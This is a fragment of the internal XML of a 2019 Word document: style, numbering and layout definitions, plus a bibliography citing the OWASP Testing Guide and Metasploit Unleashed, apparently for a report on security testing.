    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0485528"/>
    <w:lvl w:ilvl="0" w:tplc="D8C80FD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2951A53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56AC56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9"/>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20"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="21"/>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MyM7Q0MDIyMjGwsDRQ0lEKTi0uzszPAykwqgUAsn1GPywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00553D30"/>
    <w:rsid w:val="0000511D"/>
    <w:rsid w:val="00055DE4"/>
    <w:rsid w:val="00076A3C"/>
    <w:rsid w:val="000A0064"/>
    <w:rsid w:val="000F36DB"/>
    <w:rsid w:val="00171D2F"/>
    <w:rsid w:val="00177820"/>
    <w:rsid w:val="001A5F79"/>
    <w:rsid w:val="001D5418"/>
    <w:rsid w:val="001F21FD"/>
    <w:rsid w:val="002554CD"/>
    <w:rsid w:val="00293B83"/>
    <w:rsid w:val="002B4294"/>
    <w:rsid w:val="002C5AA3"/>
    <w:rsid w:val="002D1007"/>
    <w:rsid w:val="002F275B"/>
    <w:rsid w:val="00300BFB"/>
    <w:rsid w:val="00311E66"/>
    <w:rsid w:val="003127D3"/>
    <w:rsid w:val="00333D0D"/>
    <w:rsid w:val="003618AB"/>
    <w:rsid w:val="00384C51"/>
    <w:rsid w:val="00426D8B"/>
    <w:rsid w:val="00454BA1"/>
    <w:rsid w:val="00473656"/>
    <w:rsid w:val="00475C6C"/>
    <w:rsid w:val="004C049F"/>
    <w:rsid w:val="005000E2"/>
    <w:rsid w:val="00553D30"/>
    <w:rsid w:val="00561309"/>
    <w:rsid w:val="005D6F8F"/>
    <w:rsid w:val="005E20CC"/>
    <w:rsid w:val="00607724"/>
    <w:rsid w:val="00646A38"/>
    <w:rsid w:val="006A3CE7"/>
    <w:rsid w:val="006C2EAB"/>
    <w:rsid w:val="007C1BD7"/>
    <w:rsid w:val="007C49A7"/>
    <w:rsid w:val="00800C12"/>
    <w:rsid w:val="008356C2"/>
    <w:rsid w:val="00874320"/>
    <w:rsid w:val="008B3208"/>
    <w:rsid w:val="00921512"/>
    <w:rsid w:val="00A817CC"/>
    <w:rsid w:val="00A865B8"/>
    <w:rsid w:val="00AD38C3"/>
    <w:rsid w:val="00BA34D2"/>
    <w:rsid w:val="00C64D69"/>
    <w:rsid w:val="00C6554A"/>
    <w:rsid w:val="00CA0A78"/>
    <w:rsid w:val="00CB1561"/>
    <w:rsid w:val="00CC6D87"/>
    <w:rsid w:val="00D357F9"/>
    <w:rsid w:val="00D801C2"/>
    <w:rsid w:val="00D8148A"/>
    <w:rsid w:val="00DA574B"/>
    <w:rsid w:val="00E079ED"/>
    <w:rsid w:val="00E334F1"/>
    <w:rsid w:val="00E46162"/>
    <w:rsid w:val="00E572EA"/>
    <w:rsid w:val="00E67361"/>
    <w:rsid w:val="00E72F18"/>
    <w:rsid w:val="00EB09D4"/>
    <w:rsid w:val="00ED7C44"/>
    <w:rsid w:val="00F706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555C5F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AE33B70F-9E68-4C24-8C7B-EFE5BC122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561309"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00561309"/>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customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00561309"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="007789" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00561309"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="007789" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00561309"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00E46162"/>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E46162"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E46162"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D8148A"/>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 w:type="character" w:customStyle="1" w:styleId="btn">
    <w:name w:val="btn"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D814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157591">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="654333265">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1034422623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1437019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offensive-security.com/metasploit-unleashed/"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owasp.org/images/1/19/OTGv4.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28267\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htt</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{E8AA90D0-EE9C-4765-ACF9-57E309224320}</b:Guid>
    <b:URL>https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mat</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C1E157AF-EBF2-46DF-AFBD-7ED458C1B3D5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Muller</b:Last>
            <b:First>Matteo</b:First>
            <b:Middle>Meucci and Andrew</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>OWASP testing guide</b:Title>
    <b:URL>https://www.owasp.org/images/1/19/OTGv4.pdf</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4A025CC0-C038-4317-A92A-A30CC5F86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30</TotalTime>
  <Pages>19</Pages>
  <Words>1945</Words>
  <Characters>11093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Blair Alexander Niblo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>hp-0648a</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-06T15:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-14T22:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>